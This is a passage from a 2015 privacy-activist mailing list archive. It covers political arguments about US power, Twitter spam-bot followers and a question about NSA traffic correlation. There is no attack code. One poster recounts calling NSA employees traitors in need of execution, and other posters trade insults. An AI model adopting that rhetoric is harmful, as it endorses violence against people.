themselves as the good guys, so fucking what. Hey. Now I'm a pink elephant. Because I say I'm a pink elephant. J. From zen at freedbms.net Tue Jul 21 18:02:21 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Wed, 22 Jul 2015 01:02:21 +0000 Subject: an ominous comment In-Reply-To: <20150721135311.GA9266@android> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <20150721135311.GA9266@android> Message-ID: On 7/21/15, Nick Econopouly wrote: > On 07/21, Juan wrote: >> It has apologists of the US marines. >> >> It has high ranking scumbags from the CIA. >> >> It has commie 'anarchists' who are offended by (and would love >> to silence) people who badmouth the marines' apologists. > False. I wouldn't have interjected because then I am contributing to the > problems of this mailing list, but don't keep telling fabrications about > me please. You were not named in that statement. I understood that Juan was talking about someone else there ... but hey, we're all welcome to try on any hat we choose... > Literally every statement in that sentance is a lie about me. Not cool. Literally no statement in that sentence is about you. But if you take it that way, hey, cool by me. >> And NOW it also has a google and cloud apologist. Welcome >> Stephen =) You are yet another reason to distrust the FLOSS movement and >> its bloatware. > > It's amusing how Juan picked up the "apologist" term from my emails and > is now using it incorrectly. Saying something do not make it a fact. I actually picked up on the term and have used it a few times, but whatever, now we're mass debating semantics? I admit it was a favourite passtime but I really need to just no. From zen at freedbms.net Tue Jul 21 18:21:10 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Wed, 22 Jul 2015 01:21:10 +0000 Subject: an ominous comment In-Reply-To: <55AED624.4090208@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AED624.4090208@lig.net> Message-ID: On 7/21/15, Stephen D. Williams wrote: > On 7/21/15 2:03 AM, Zenaan Harkness wrote: >> On 7/21/15, Stephen D. Williams wrote: >>> On 7/20/15 10:32 PM, Juan wrote: >>>> On Mon, 20 Jul 2015 21:36:57 -0700 >>>> "Stephen D. Williams" wrote: >>>>> On 7/20/15 9:07 PM, Juan wrote: >>>>>> Hey. *Now* I get it. >>>>> Anyway, if you're still in the rebelling against authority stage, >>>>> fine, have fun. Good luck with that. In the US, government wise, >>>>> the people are the authority >>>> Really? That's an interesting concept. How many lsd doses do >>>> you need in order to reach the parallel universe where that >>>> is reality? Because in this universe, it isn't. >>> You haven't been watching long or closely enough. Things have changed >>> a lot in the US in my lifetime, and it's only speeding up. >> Sadly, individual liberty was not respected enough to capture the >> sanction of foreign thinkers. I'm being extraordinarily conservative >> in my words here... > > "Capture the sanction of foreign thinkers"? Nonsense. Sorry, my bad, USA is hailed by the rest of the world as the pinnacle of the High Moral Ground (TM), almost no one has problems they take issue with, with the USA, and governments round the world are clamouring for a one world order lead by the halo clad Obama (or pick any prior president not including Kennedy). Gee whiz jiggity, I keep gettin my sense and my non sense all mixed up now... apollo-gees, yall. From sdw at lig.net Wed Jul 22 01:37:29 2015 From: sdw at lig.net (Stephen D. Williams) Date: Wed, 22 Jul 2015 01:37:29 -0700 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AED624.4090208@lig.net> Message-ID: <55AF5649.7090406@lig.net> On 7/21/15 6:21 PM, Zenaan Harkness wrote: > On 7/21/15, Stephen D. Williams wrote: >> On 7/21/15 2:03 AM, Zenaan Harkness wrote: >>> On 7/21/15, Stephen D. Williams wrote: >>>> On 7/20/15 10:32 PM, Juan wrote: >>>>> On Mon, 20 Jul 2015 21:36:57 -0700 >>>>> "Stephen D. Williams" wrote: >>>>>> On 7/20/15 9:07 PM, Juan wrote: >>>>>>> Hey. *Now* I get it. >>>>>> Anyway, if you're still in the rebelling against authority stage, >>>>>> fine, have fun. Good luck with that. In the US, government wise, >>>>>> the people are the authority >>>>> Really? That's an interesting concept. How many lsd doses do >>>>> you need in order to reach the parallel universe where that >>>>> is reality? Because in this universe, it isn't. >>>> You haven't been watching long or closely enough. Things have changed >>>> a lot in the US in my lifetime, and it's only speeding up. >>> Sadly, individual liberty was not respected enough to capture the >>> sanction of foreign thinkers. I'm being extraordinarily conservative >>> in my words here... >> "Capture the sanction of foreign thinkers"? Nonsense. > Sorry, my bad, USA is hailed by the rest of the world as the pinnacle > of the High Moral Ground (TM), almost no one has problems they take > issue with, with the USA, and governments round the world are > clamouring for a one world order lead by the halo clad Obama (or pick > any prior president not including Kennedy). > > Gee whiz jiggity, I keep gettin my sense and my non sense all mixed up > now... apollo-gees, yall. Your sentence is nonsense. I can't parse it. Maybe in the original Russian it was coherent. sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3259 bytes Desc: not available URL: From sdw at lig.net Wed Jul 22 01:44:30 2015 From: sdw at lig.net (Stephen D. Williams) Date: Wed, 22 Jul 2015 01:44:30 -0700 Subject: an ominous comment In-Reply-To: <1437524169.568880.329705825.556F643B@webmail.messagingengine.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AED624.4090208@lig.net> <1437524169.568880.329705825.556F643B@webmail.messagingengine.com> Message-ID: <55AF57EE.8090100@lig.net> On 7/21/15 5:16 PM, Alfie John wrote: > On Wed, Jul 22, 2015, at 09:30 AM, Stephen D. Williams wrote: >> Even when the US meddled, except for a very few circumstances, it was >> to achieve something useful, > Useful to whom? Not to the Chagossians of Diego Garcia in the 60s and > 70s. FFS, the _whole population_ was kicked off the island. You do realize that it was the British that depopulated the islands, right? The land had been purchased, there were about 1200 people displaced, and it happened 40 years ago. In any case, that falls into the category of something that shouldn't have been done, at least not in so poor a way. >> not to subjugate peoples for colonies > Maybe you should read: > > https://en.wikipedia.org/wiki/Depopulation_of_Chagossians_from_the_Chagos_Archipelago > >> provides lots of protection and other benefits, and generally attempts >> fit in and be respectful. > You should stop drinking the Koolaid. > > It's funny how so many patriots love the country they happened to have > been born in. > > Alfie > sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2066 bytes Desc: not available URL: From sdw at lig.net Wed Jul 22 02:03:07 2015 From: sdw at lig.net (Stephen D. Williams) Date: Wed, 22 Jul 2015 02:03:07 -0700 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AE10C2.6050501@pilobilus.net> <55ae9473.d8ea8c0a.b49bb.ffff9972@mx.google.com> <51A031B8-7E9C-4D04-8ADF-6DDDE1F39296@obscura.com> Message-ID: <55AF5C4B.2040302@lig.net> On 7/21/15 8:49 PM, Seth wrote: > On Tue, 21 Jul 2015 13:54:25 -0700, Lance Cottrell wrote: > >> I recall it being more nuanced and diverse. > > I wasn't there in the beginning so I don't have any firsthand knowledge. > > According to this piece, [1] "Almost all cypherpunks were anarchists who regarded the state as the enemy." I will have to dig to find my archives of that era to be positive, but I'm pretty sure I joined by 1994 at the latest, probably 1993. I installed the first firewall at Bank of America in late 1994, so it may have been much earlier since I'd already been into security for a while at that point. I was part of the whole rise and fall of Detweiller. I'm always puzzled that most people haven't heard of him. http://borg.uu3.net/ldetweil/medusa/detweiler.html > > I'm basing the claim on the fact that founding member Timothy May wasn't exactly shy about his crypto *anarchy* vision of the future. > > Not sure what exactly what Eric Hughes or John Gilmore's were at the time. > > > [1] http://onlyinamericablogging.blogspot.jp/2011/03/robert-manne-julian-assange-cypherpunk.html sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2165 bytes Desc: not available URL: From rysiek at hackerspace.pl Wed Jul 22 00:08:14 2015 From: rysiek at hackerspace.pl (rysiek) Date: Wed, 22 Jul 2015 09:08:14 +0200 Subject: In-Reply-To: References: <55AC5B26.8050100@pobox.com> Message-ID: <3561590.t9AOVu5qj6@lapuntu> Dnia niedziela, 19 lipca 2015 22:31:42 coderman pisze: > does this taper off? or just a constant stream of noise... It's a feature not a... no, wait, it really isn't. :( -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From rysiek at hackerspace.pl Wed Jul 22 00:10:09 2015 From: rysiek at hackerspace.pl (rysiek) Date: Wed, 22 Jul 2015 09:10:09 +0200 Subject: Welcome to the future JYA! cryptome TLS enabled... In-Reply-To: References: Message-ID: <37833538.J47TLoDEqM@lapuntu> Dnia wtorek, 21 lipca 2015 20:59:21 Seth pisze: > On Tue, 21 Jul 2015 20:28:55 -0700, coderman wrote: > > https://cryptome.org/ > > > > is even EV special! > > Holy Schnikes, this must mean the rapture is around the corner. That's a second place I see the word "rapture" today: http://www.smbc-comics.com/index.php?id=3804 Something's in it, I'm sure! -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From rysiek at hackerspace.pl Wed Jul 22 00:20:40 2015 From: rysiek at hackerspace.pl (rysiek) Date: Wed, 22 Jul 2015 09:20:40 +0200 Subject: an ominous comment In-Reply-To: <55aefee6.540f370a.4a711.ffffd806@mx.google.com> References: <55aefee6.540f370a.4a711.ffffd806@mx.google.com> Message-ID: <5823340.IlZMU9Ofa3@lapuntu> Dnia wtorek, 21 lipca 2015 23:25:53 Juan pisze: > (...) -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: scarjo_popcorn.gif Type: image/gif Size: 2293534 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From rich at openwatch.net Wed Jul 22 09:23:02 2015 From: rich at openwatch.net (Rich Jones) Date: Wed, 22 Jul 2015 09:23:02 -0700 Subject: Internet Scale Forensic Traffic Correlation Message-ID: Have we seen any evidence of the ability of the NSA/FIVEEYES to do internet or national scale retroactive traffic correlation? Not just for Tor exit nodes, but for any arbitrary connection. For instance, if I upload a 64.32Kb exploit to a server, and they know forensically that the exploit arrived at 12:01:01PM, do they have the capability to see all connections, internet-wide, which sent ~64.32Kb of data within the previous, say, ~500-2000ms? (A useful capability for anybody trying van paedos behind 7 proxies, but bad news for hackers, junkies and other weirdos.) Technical details around this capability would be very useful for designing high-latency and chaff-based anonymity tools. Ex, a global chaff network to cover a given byte-size range, steganographic proxies, etc. Another one to add to the list of "if you happen to have access access to the Snowden cache, please set this information free" requests (along with any info compiler backdoors, KH-13, operating system backdoors, transit cards, cryptocurrencies, burners, advertising industry partners, Oracle, Narus, etc etc etc..). Pretty please, massa Greenwald? R -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1214 bytes Desc: not available URL: From rysiek at hackerspace.pl Wed Jul 22 00:46:59 2015 From: rysiek at hackerspace.pl (rysiek) Date: Wed, 22 Jul 2015 09:46:59 +0200 Subject: an ominous comment In-Reply-To: <55AD8704.8070104@pilobilus.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> Message-ID: <3661192.mUKEqv19Hn@lapuntu> Dnia poniedziałek, 20 lipca 2015 19:40:52 Steve Kinney pisze: > On 07/20/2015 05:53 PM, Stephen D. Williams wrote: > > I hold multitudes. I am in one thread totally cypherpunk, and > > have been for a very long time. There are innumerable ways to > > compromise and be compromised for all kinds of good and mostly > > bad reasons. Perfect protection is tough for in many ways and > > we should keep striving to get closer to that ideal security > > stance. > > > > On the other hand, life is a balance. I probably shouldn't > > have tried to make the point here, but it is something a > > security professional should understand well: The right amount > > of security should be moderated by the tradeoff of costs vs. > > overhead vs. maximizing benefit vs. minimizing loss. Security > > stances change over time and aren't necessarily accurately > > reflected by paranoid absolutism. > > Right you are, in "security" context is everything. My take on > the Cypherpunk Way is, start with design concepts for maximum > security (!= absolute security), then trim the security > constraints back just enough to permit useful work to be done on a > cost effective basis. This should also be the case with privacy. Start with maximum privacy and trim down if absolutely *needed*. -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From rysiek at hackerspace.pl Wed Jul 22 00:47:52 2015 From: rysiek at hackerspace.pl (rysiek) Date: Wed, 22 Jul 2015 09:47:52 +0200 Subject: an ominous comment In-Reply-To: <55adc555.0ae88c0a.425f.3132@mx.google.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> Message-ID: <1588252.tKBBYif51o@lapuntu> Dnia wtorek, 21 lipca 2015 01:07:55 Juan pisze: > Hey. *Now* I get it. > > This mailing list has a lot of tor-tards who are apologists of > the pentagon's propaganda and spying efforts. Well, I wouldn't call you a "tor-tard", but if you insist... -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From rysiek at hackerspace.pl Wed Jul 22 00:51:57 2015 From: rysiek at hackerspace.pl (rysiek) Date: Wed, 22 Jul 2015 09:51:57 +0200 Subject: an ominous comment In-Reply-To: <55ACB233.8020904@cathalgarvey.me> References: <20150714155203.826F52282E2@palinka.tinho.net> <55ACB233.8020904@cathalgarvey.me> Message-ID: <5753507.exg6TKRYUx@lapuntu> Dnia poniedziałek, 20 lipca 2015 09:32:51 Cathal Garvey pisze: > I happen to know someone personally who went to one of the largest > social networks out there, and just asked if he could have full backend > access to play around and go data mining. They didn't bat an eyelid and > gave him access to the kind of data you don't get even from the paid API. > > This guy happens to be exceptionally convincing, but he wasn't being > disingenuous; he literally just promised to fish around and see if he > could find and visualise any cool stuff, and they opened up. Then there's that: http://actualfacebookgraphsearches.tumblr.com/ > So, no. Your data isn't remotely safe, not even a little bit. Very much so. -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From Rayzer at riseup.net Wed Jul 22 09:59:14 2015 From: Rayzer at riseup.net (Razer) Date: Wed, 22 Jul 2015 09:59:14 -0700 Subject: In-Reply-To: References: Message-ID: <55AFCBE2.9010500@riseup.net> On 07/19/2015 06:10 PM, coderman wrote: > joined the twitters recently, > noticed that many of my posts attract "favorite'ers" > > who are honey pots. E.g.: > - https://twitter.com/AudreySykestfm > - https://twitter.com/EvelynHarri0pp > - https://twitter.com/PenelopeRosap8 > - https://twitter.com/AdalynEsteskul > - https://twitter.com/PazhetnykhMiss > - https://twitter.com/helensmithusacc > - https://twitter.com/RubyFlemingdy5 > - https://twitter.com/KaelynMorenm2g > - https://twitter.com/PeytonKanee97 > - https://twitter.com/LilyArnoldvkm > > maybe social research, or ... ? i guess they think i've got a type :P > > > best regards, > not interested codermange > I get these sorts of follows whenever I hashtag #NSA or use @FBI. I got a large number of them when I suggested the people who work at the NSA were traitors in need of execution. My 'follow-stalkers' are typically 'girls' posting various types of pron interspersed with tweets about a variety of subjects where I inevitably end up seeing the same tweets across the various accounts. Many of the links posted, when not to pron sites go to 'humorous photo gallery' sites, of which most seem to be hosted by... Wait for it, Cloudflare. I report the accounts as spam. I checked a couple of the links you posted and apparently they've already been reported and 'account suspended'. RR Ps. It tapers off until (see top of my comment. Rinse lather repeat) -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From drwho at virtadpt.net Wed Jul 22 10:02:54 2015 From: drwho at virtadpt.net (The Doctor) Date: Wed, 22 Jul 2015 10:02:54 -0700 Subject: Welcome to the future JYA! cryptome TLS enabled... In-Reply-To: <37833538.J47TLoDEqM@lapuntu> References: <37833538.J47TLoDEqM@lapuntu> Message-ID: <55AFCCBE.9040505@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/22/2015 12:10 AM, rysiek wrote: >> Holy Schnikes, this must mean the rapture is around the corner. > > That's a second place I see the word "rapture" today: > http://www.smbc-comics.com/index.php?id=3804 I don't know about the rapture, but I just finished uploading myself... - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ Eve was framed! -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJVr8y5AAoJED1np1pUQ8Rk70YP/RMEPjJES6WTjHt6ZWy4QPv7 ZIECxtHcvLTVGL+7GeXVUFzpIoDNeJC2FJOfSFyJc0otiiPUKKnjjJ1Y8sDTiPjQ kPDKIZrRoiQrWoTZhTMz4OSnBTIVhEqw9Xd2dd7P2vV7UpKdx+QKXHSt0/8deQhX VtX/DLA1tO1llxXQEviQmjVVdHUO/nBlHzuSLlhQXTCSfwBrtQZ40cXBroC640Ib bqkfejS+ePVHYseMN5yhRPDC8l+9FZz/EpO241E1WuVEb1nPFbqEZL9mj/0IkH+N zsvfBSVVRY1lpA7GxzHawxAqhCViKd+Qqcbeho20qfExjoF5u6OewQjkBqjUab3j tP8wU0PhcEDeZqb/J9qb0faRkbmSB4LO0IPXi7Gz6VJUHZahrkY7EpkOTPmokNQy ESxTfp+x13au8Uu8Q/Jt0XvIttUtAD6Lq26avfcqCP5QOVY3FaRYBnHD3uQt8Igb gK5djeU9FmegT7GLGrAqoKjeQ8xjMCbUvsEiOOMSBtGE1Nd4l05kcoC2d1jGPW+L 8bOtCE0faNEyiu8fTRoHL70F0llPniWhToT44yCS6ZiT5+ZK3eUqHcmZYF90cGuy rGH4f/hG0kbJQNswrUVwUv2RhANspQfEe6weE/8FQeNkSTOqqE+XzE+gVyZKUUdH gCzNJe7KDK+2ffEPr5Ru =DvCF -----END PGP SIGNATURE----- From drwho at virtadpt.net Wed Jul 22 10:05:17 2015 From: drwho at virtadpt.net (The Doctor) Date: Wed, 22 Jul 2015 10:05:17 -0700 Subject: an ominous comment In-Reply-To: <55AF5649.7090406@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AED624.4090208@lig.net> <55AF5649.7090406@lig.net> Message-ID: <55AFCD4D.6080408@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/22/2015 01:37 AM, Stephen D. Williams wrote: > Your sentence is nonsense. I can't parse it. Maybe in the > original Russian it was coherent. It makes you wonder how many posts here are actually the output of Markov chain generators trained on vintage 90's mailing list archives or declassified COINTELPRO files or something. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ Eve was framed! -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJVr81NAAoJED1np1pUQ8RkEM0QAJH83oGNwvEwyFTIbgd5Hc0G J7Q60MG0PDZeGNxlIGOupK/JrKWTBxC6HmYoW+nNQ1hjOQpI2gmceA4caMS6/gdr V1CdR6SV5c43MAb4fEAhF0uOItMlwTz5Z4ELTiRY/BWCbQLgjKzxkwbvSy8VZCKz dLdZwZrimUq0r036nU2r6A4mcfzjfLgOVqlKhyk/nBBkI/PKmwyhsj05xbhQgI6r pczHWeTCN9tiEUAaz8THozytCYquE6cYnd5BpF1UjWEN+AY4HrFMT/Ha0TXXc+hF 4AP7zT1WSvUNdoZsn3p3XGEgSu3XRyt7ZZ+CNpo3cauAAqca0tc6otKezR58upXL JsmfaLS9A7crm1n6kGbuYPoypYH4iefA4OyveUdyw353UgJ7HL3xXB2g5AUqczQW gZlam/Yhts434agy3JSXTfEMAZaP+Nf4rGhSInPljp7AIswyq0y6w5STyNnHw+92 leMrakcMoVRcpyS7mwd6Eric9BnTaM0SD8tuTlVyWS+zaesTDINj64AC1A3SkDCR YHrzq7KE8ys+73MOgl5fvHTy8QX200GSQISau36eOGKyeF8OHfY7eyidsClYRtTD wlhTrFhNRnUGYrARYl00ZDAiwqdP05T7JSkl5HJaIcRTgV8RLHMqwbFzGnpptq0p qs3v0bf0iX8JpXGtcNbU =nvmc -----END PGP SIGNATURE----- From alfiej at fastmail.fm Tue Jul 21 17:16:09 2015 From: alfiej at fastmail.fm (Alfie John) Date: Wed, 22 Jul 2015 10:16:09 +1000 Subject: an ominous comment In-Reply-To: <55AED624.4090208@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AED624.4090208@lig.net> Message-ID: <1437524169.568880.329705825.556F643B@webmail.messagingengine.com> On Wed, Jul 22, 2015, at 09:30 AM, Stephen D. Williams wrote: > Even when the US meddled, except for a very few circumstances, it was > to achieve something useful, Useful to whom? Not to the Chagossians of Diego Garcia in the 60s and 70s. FFS, the _whole population_ was kicked off the island. > not to subjugate peoples for colonies Maybe you should read: https://en.wikipedia.org/wiki/Depopulation_of_Chagossians_from_the_Chagos_Archipelago > provides lots of protection and other benefits, and generally attempts > fit in and be respectful. You should stop drinking the Koolaid. It's funny how so many patriots love the country they happened to have been born in. Alfie -- Alfie John alfiej at fastmail.fm From drwho at virtadpt.net Wed Jul 22 10:39:28 2015 From: drwho at virtadpt.net (The Doctor) Date: Wed, 22 Jul 2015 10:39:28 -0700 Subject: In-Reply-To: <55AFCBE2.9010500@riseup.net> References: <55AFCBE2.9010500@riseup.net> Message-ID: <55AFD550.6030109@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/22/2015 09:59 AM, Razer wrote: > I get these sorts of follows whenever I hashtag #NSA or use @FBI. I > got It would be interested to use Twitter's back-end API to (automagickally) gather information on new follows and see what shakes out. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ Eve was framed! -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJVr9VQAAoJED1np1pUQ8RkB68P/3KMuYbY00X+LgVJl+LYuAJN EEKs1LFDSGEmP6QnPsKJbPDUZMxvBG0TNHN3w8w5NlgpJXc6DhX3lwTqCFzlZThG c/I/x8D6XLWC5wg8FZj24gQNg+TLD3EfvNnWZ2z4YwcMQHNhzH+9V+RX55u2ZcMk 29+qBHFrNSDgGEceQRYMheSB85UBJ4yU7A2RmeQVTlAThwnqzPLgCznWcb2sC3O2 cQZhOxoySK3GzGWT/Jdrr6Qb5qKobkBtrDBdieqpNDWmjLr40I4ByLws/CBOPFBI dcil8CpV5tNQuAbiZBYOUiKE1qK34T0ubnJt2yc+lAv28tIfAoLviermthMUz+FT bZA+l7EGE3TELxwS5ngU7CCMz3YJIbIIHkKbt9QxsFb2ygErIKKa6loN+gY56SuM Wyup/a7N6TYuCgpKLuqwZU3wiP7oNqX0HTQjIPMytk++1uNWP4LWnyqPBOm+jyqm 8uXoLhhuWtOVvj59Qx6IWO2BDcAeZlhGjsa6WJKhiefNs2nnsQ7EiFiQ7jj6apKL vfnBX7cfTNVNgxH8rNxKTNJnzBsQC72bAjX/TlF22WhLuaNyhHecExFGHIK20fIf pfG6jRLGlX0QQ5UoMQBFZyulPICsc2qwWG01yxJUyVr7px9yEsQdeCoqXEWoOFYj vg74QqMgGzGK8ZK980G7 =NBlc -----END PGP SIGNATURE----- From reed at unsafeword.org Wed Jul 22 16:11:29 2015 From: reed at unsafeword.org (Reed Black) Date: Wed, 22 Jul 2015 16:11:29 -0700 Subject: In-Reply-To: References: Message-ID: If you look at people who have a large number of followers which their activity or identity wouldn't normally warrant, you will find that the synthetic accounts who follow them exhibit a lot of random retweeting and favoriting behavior. Many of the synthetic accounts also do double duty by posting spam links should anyone visit them. All speculation, but: There are people who offer paid follower, favoriting, and retweeting services. I suspect the operators include more bogus activity than paid activity on the synthetic accounts. The additional activity would muddy any third-party analysis. For example, it would make it harder for Twitter to spot bogus accounts. It would also be harder to know who's really paying for artificial activity versus who's been randomly selected (if Twitter even cares about such things). If the crap favoriting gets these accounts some non-synthetic followers or visits, they also become useful vehicles for those spam links. It's doubtful that Twitter worries as much about accounts that spam if people visit the account after a favorite and see a spam link, rather than the spammer revealing the spam to others with @mentions. On Sun, Jul 19, 2015 at 6:10 PM, coderman wrote: > joined the twitters recently, > noticed that many of my posts attract "favorite'ers" > > who are honey pots. E.g.: > - https://twitter.com/AudreySykestfm > - https://twitter.com/EvelynHarri0pp > - https://twitter.com/PenelopeRosap8 > - https://twitter.com/AdalynEsteskul > - https://twitter.com/PazhetnykhMiss > - https://twitter.com/helensmithusacc > - https://twitter.com/RubyFlemingdy5 > - https://twitter.com/KaelynMorenm2g > - https://twitter.com/PeytonKanee97 > - https://twitter.com/LilyArnoldvkm > > maybe social research, or ... ? i guess they think i've got a type :P > > > best regards, > not interested codermange > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3176 bytes Desc: not available URL: From reed at unsafeword.org Wed Jul 22 16:15:55 2015 From: reed at unsafeword.org (Reed Black) Date: Wed, 22 Jul 2015 16:15:55 -0700 Subject: In-Reply-To: References: <55AC5B26.8050100@pobox.com> Message-ID: >From discussion elsewhere, there was agreement that if you routinely block spammers and junk favoriters the activity rapidly falls off. With the official twitter site and most clients, if you report abuse you also block the reported party. If the bot operator periodically checks whether it's blocked after favoriting or @mentioning, they would build up a list of who's best left alone. Their goals would include going unnoticed by Twitter governance. Anyone they can detect as blocking their accounts can be assumed to also be reporting the accounts. On Sun, Jul 19, 2015 at 10:31 PM, coderman wrote: > does this taper off? or just a constant stream of noise... > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1013 bytes Desc: not available URL: From juan.g71 at gmail.com Wed Jul 22 13:00:41 2015 From: juan.g71 at gmail.com (Juan) Date: Wed, 22 Jul 2015 17:00:41 -0300 Subject: an ominous comment In-Reply-To: <1588252.tKBBYif51o@lapuntu> References: <20150714155203.826F52282E2@palinka.tinho.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <1588252.tKBBYif51o@lapuntu> Message-ID: <55aff616.c61c8d0a.70803.760b@mx.google.com> On Wed, 22 Jul 2015 09:47:52 +0200 rysiek wrote: > Dnia wtorek, 21 lipca 2015 01:07:55 Juan pisze: > > Hey. *Now* I get it. > > > > This mailing list has a lot of tor-tards who are apologists > > of the pentagon's propaganda and spying efforts. > > Well, I wouldn't call you a "tor-tard", but if you insist... I'm not following. From juan.g71 at gmail.com Wed 